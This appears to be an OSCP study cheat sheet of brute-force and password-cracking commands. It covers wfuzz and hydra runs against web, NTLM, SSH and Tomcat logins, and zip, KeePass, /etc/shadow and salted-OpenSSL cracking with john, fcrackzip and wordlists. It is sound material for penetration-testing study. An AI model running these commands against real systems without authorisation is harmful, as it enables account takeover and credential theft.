OSCP
Brute Force

Weak Credentials

HTTP Brute Force
  • wfuzz POST
wfuzz --hc 404 -c -z list,admin -z file,/root/Documents/SecLists/Passwords/korelogic-password.txt -d "user=FUZZ&password=FUZ2Z" http://ip/admin/index.php
  • hydra POST
hydra ip -s 80 http-form-post "/admin/index.php:user=^USER^&password=^PASS^:Moved Temporarily" -l admin -P /root/Documents/SecLists/Passwords/korelogic-password.txt -t 20
  • wfuzz NTLM
wfuzz -c --ntlm "admin:FUZZ" -z file,/root/Documents/SecLists/Passwords/darkc0de.txt --hc 401 https://<ip>/api
  • wfuzz Basic Auth through Proxy
wfuzz -c --hc 404,400,401 -z file,/root/Documents/Audits/Activos/names.txt -z file,/root/Documents/Audits/Activos/names.txt --basic "FUZZ:FUZ2Z" -p 127.0.0.1:8080 https://<ip>/api/v1/
Password Cracking
  • zip
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt file.zip
  • /etc/shadow
unshadow passwd shadow > passwords
john --wordlist=/usr/share/wordlists/rockyou.txt passwords
  • keepass
keepass2john /root/Desktop/NewDatabase.kdb > file
john -incremental:alpha -format=keepass file
  • Bruteforce Salted
for j in $(cat cipher); do echo $j; for i in $(cat digestion); do /root/Documents/HTB/Hawk/bruteforce-salted-openssl/bruteforce-salted-openssl -t 10 -f /usr/share/wordlists/rockyou.txt -c $j -d $i ../miau.txt -1 2>&1 | grep "candidate" ; done ; done
openssl aes-256-cbc -d -in ../miau.txt -out result.txt -k friends
Port 22
hydra -f -V -t 1 -C /usr/share/SecLists-5c9217fe8e930c41d128aacdc68cbce7ece96e4f/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt -s 22 $IP ssh
Hydra for login bypass
hydra http://XXXX http-form-post "/TARGETPATH/TARGETPAGE.php:user=^USER^&pass=^PASS^:Bad login" -L users.txt -P pass.txt
hydra -C /seclist/tomcat-betterdefaultpasslist http-get://ip:port/manager/html
hydra -C /root/attacker-framework/SecLists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt http-get://ip:8080/manager/html
Zip file Bruteforce
fcrackzip -D -v -u -p /usr/share/wordlists/rockyou.txt backup.zip
John
john --wordlist=/usr/share/wordlists/rockyou.txt keepass-hash.txt